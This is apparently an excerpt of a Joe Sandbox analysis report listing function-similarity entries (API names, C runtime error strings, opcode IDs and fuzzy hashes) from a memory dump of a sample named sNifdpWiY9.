                            • String ID:
                            • API String ID: 3111578849-0
                            • Opcode ID: f3b2bc0e744dbaf009bdae409e5f4cde7982ddea07681dc902a01fbbe549e632
                            • Instruction ID: 58a2bb3b5bd1cb3281f4021f68e6219068166b394f621639c0ae2a9da4258409
                            • Opcode Fuzzy Hash: f3b2bc0e744dbaf009bdae409e5f4cde7982ddea07681dc902a01fbbe549e632
                            • Instruction Fuzzy Hash: 3AF16062619FC685DB50AF69E4801ADE361FB85BE4F880532EE5D877E9DF6CE440C320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen$memcpy
                            • String ID:
                            • API String ID: 3396830738-0
                            • Opcode ID: 37d2dfbbb759d6df7f8265c6c14d538c43e846403ee324bc105c37155cde724f
                            • Instruction ID: c1092adae7a5e12f915935dc3ee91fdde19b2498d82f06265d78573229d2ea35
                            • Opcode Fuzzy Hash: 37d2dfbbb759d6df7f8265c6c14d538c43e846403ee324bc105c37155cde724f
                            • Instruction Fuzzy Hash: 82F1B066B09FC685DA50EB1AD4402EEA361FB85BD4F984532EE5D87799DF7CE400C320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen$memcpy
                            • String ID:
                            • API String ID: 3396830738-0
                            • Opcode ID: 4d91de09d6f7f0c78ef8df6a80a4fbd67d19c98723a62cb30ef7a99235b2e5cc
                            • Instruction ID: 77e81d082d785988ce3301508553f6817029be3a2339ae44a375d34396be1117
                            • Opcode Fuzzy Hash: 4d91de09d6f7f0c78ef8df6a80a4fbd67d19c98723a62cb30ef7a99235b2e5cc
                            • Instruction Fuzzy Hash: D9F1B166A0AFCA85DA50EF1AD4401EEA361FB85BD4F984532EE5D87798DF3CE404C360
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: FormatFreeLocalMessage
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 1427518018-2991274800
                            • Opcode ID: ac24d2563818ce243d1681c24704f73b4898fbdea5b8404f9f28d57b1cbb316a
                            • Instruction ID: 59b1eb1b0b336a41273a5a779d1b6cf077e4f2942753bd3f07524619e07e1105
                            • Opcode Fuzzy Hash: ac24d2563818ce243d1681c24704f73b4898fbdea5b8404f9f28d57b1cbb316a
                            • Instruction Fuzzy Hash: 4131B172A19F8181EB54AB25E4003EEA3A0EF41BC0FD84133DA4D8B798DF7CE4589710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: %p not found?!?!
                            • API String ID: 383729395-11085004
                            • Opcode ID: aa726d4ec39a1b03dee952394c738b9590541e00b5c2896a655777c3348429ee
                            • Instruction ID: 0a694166266b4ffc468e11de6d412e243bae404dce15c30bbb36b68523321abb
                            • Opcode Fuzzy Hash: aa726d4ec39a1b03dee952394c738b9590541e00b5c2896a655777c3348429ee
                            • Instruction Fuzzy Hash: AD112422E4EB8281FA557F5595512F8D6919F45BC4F8C0435CD1D0F798DE2CF891A360
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-3474627141
                            • Opcode ID: 86296525dab937d97088590447f80607ab5b5172a7fd0f15c8811183563d59f3
                            • Instruction ID: 78c2a5387d48c01303245cc08caead7773e9f26f5dd4465350cc9bc491b648b0
                            • Opcode Fuzzy Hash: 86296525dab937d97088590447f80607ab5b5172a7fd0f15c8811183563d59f3
                            • Instruction Fuzzy Hash: 8D01C262C1CFC482D2019F18D8011FAB330FBAE749F699325EBCC2A515DF29E592C700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: ExceptionRaiseabort
                            • String ID: CCG
                            • API String ID: 2956646853-1584390748
                            • Opcode ID: 0e290a38f324416441cc4735ddf82908deb667d23209b74b4bf36d8904e48b31
                            • Instruction ID: 13cd6530a313043fcded36563a6d97659d075fbbeff475b1be4b43ef0abe1b0a
                            • Opcode Fuzzy Hash: 0e290a38f324416441cc4735ddf82908deb667d23209b74b4bf36d8904e48b31
                            • Instruction Fuzzy Hash: 3B016762D24B8286E714AB5894413F96360FBF970CFB0A325E58C09175DF79D6F39640
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID: *** stack smashing detected ***: terminated
                            • API String ID: 2429186680-3581952252
                            • Opcode ID: f723e39cbaf28602d0cac3586fbf9f914b69b61a76cd9029937cc74dc0d97243
                            • Instruction ID: 8170a0c2fbd39e2bb408689fb5c3d3bbb898ffe91378a08d1d696f8d53f5e4df
                            • Opcode Fuzzy Hash: f723e39cbaf28602d0cac3586fbf9f914b69b61a76cd9029937cc74dc0d97243
                            • Instruction Fuzzy Hash: D2E0C200F29A8286F6043BA1E8193F49222AF46381FEC0035C50E8F2E6CE1CAC069360
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-4064033741
                            • Opcode ID: b8903fb8af9ac55113e2dd661c79fc65ca9ce30cda7416b04a9329fcad6584f1
                            • Instruction ID: 4cebd06e543d764e4b72f2c54a2128fbe33593643c2165991b098e07e0544e8b
                            • Opcode Fuzzy Hash: b8903fb8af9ac55113e2dd661c79fc65ca9ce30cda7416b04a9329fcad6584f1
                            • Instruction Fuzzy Hash: 68F06256C19F8482D202AF1CA4000EBB330FF9D798F585325EFCD3A555DF29E5829710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-4283191376
                            • Opcode ID: 285349a251c64339f04fc4c54c699bbe7271dbdd743e08541f3c43729369352d
                            • Instruction ID: 51335d12980641d47f427618aad3830bb7cf6e3b5e77d20df302c894dd521037
                            • Opcode Fuzzy Hash: 285349a251c64339f04fc4c54c699bbe7271dbdd743e08541f3c43729369352d
                            • Instruction Fuzzy Hash: 55F04F56819E8482D202AF1CA4000EAB330FB9D788F589325EB8D3A555DF29E5929710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-4273532761
                            • Opcode ID: 729a26408af7f9b31892fe35bd8e0bda095de04b46c84ef09850f8b6fc79f211
                            • Instruction ID: 01ce43cbbf6e89c1245a0a97099a9de4826104d332c5ed679a45cdadbddc34f7
                            • Opcode Fuzzy Hash: 729a26408af7f9b31892fe35bd8e0bda095de04b46c84ef09850f8b6fc79f211
                            • Instruction Fuzzy Hash: D2F04F56819E8482D202AF18A4000EAB330FB9D788F585325EB8D2A515DF29E5829710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-2187435201
                            • Opcode ID: 3aca8553ef5ba559b2e9ff714939cfa1a15f87c4296170278ffcb4b13cfe5542
                            • Instruction ID: a007e741259994c672a99b3f8e4b83a25e4de571bed2437bd997227de13c961f
                            • Opcode Fuzzy Hash: 3aca8553ef5ba559b2e9ff714939cfa1a15f87c4296170278ffcb4b13cfe5542
                            • Instruction Fuzzy Hash: 54F04F56819E8482D202AF18A4010EAB330FB9D788F589325EB8D2A555DF29E5829710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-2713391170
                            • Opcode ID: 3f76d3b8eb91cbaab5872e0bdae80496e65db91be6cba9d8e2bcf6808cea8f07
                            • Instruction ID: 69d0479272ee20d524e0afaf29a634b907e2f5a125b421e1d9ff6a6f87320969
                            • Opcode Fuzzy Hash: 3f76d3b8eb91cbaab5872e0bdae80496e65db91be6cba9d8e2bcf6808cea8f07
                            • Instruction Fuzzy Hash: BAF04F56819E8482D202AF18A4000EAB330FB9E788F585325EB8D2A555DF29F5829710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fprintf
                            • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                            • API String ID: 383729395-2468659920
                            • Opcode ID: ceb1d10968b56ae12f8218274e2f7060f081a16a0fddc52b9ca8b7d4aad8434f
                            • Instruction ID: 23cbdb4a43b005e67801f88f668e08e5a27867143faba21f120c34786d7bfb46
                            • Opcode Fuzzy Hash: ceb1d10968b56ae12f8218274e2f7060f081a16a0fddc52b9ca8b7d4aad8434f
                            • Instruction Fuzzy Hash: A0F06D52819F8882D202AF18A4000ABB330FB8E789F589326EFCD2A515DF29E5828710
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: ca91c7dbbf9fbdf0c5d4d1ce98c90f55577ddd39ed406988b4c5d7c94ea76e82
                            • Instruction ID: b74ac3a0d2c3ed053a3c74402614508d6c37166e0571184894cd65300d53a842
                            • Opcode Fuzzy Hash: ca91c7dbbf9fbdf0c5d4d1ce98c90f55577ddd39ed406988b4c5d7c94ea76e82
                            • Instruction Fuzzy Hash: 0331BC62E08B8686EB549F35D8002E86354FF41B59F9C8331DD1D5E298EF3DE492D310
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: f6575ff4926492822f6dd9a617c15dbf444f12e99157ee217c3459317f1afd58
                            • Instruction ID: 0f0eb43351564cc44e9f6b6a3b97eb67636bc7459d652adb64743012433f1664
                            • Opcode Fuzzy Hash: f6575ff4926492822f6dd9a617c15dbf444f12e99157ee217c3459317f1afd58
                            • Instruction Fuzzy Hash: F2217773B08B4586E7549F25D4003F9A394EB44BA8F9C4231DE198F384DF38E995D760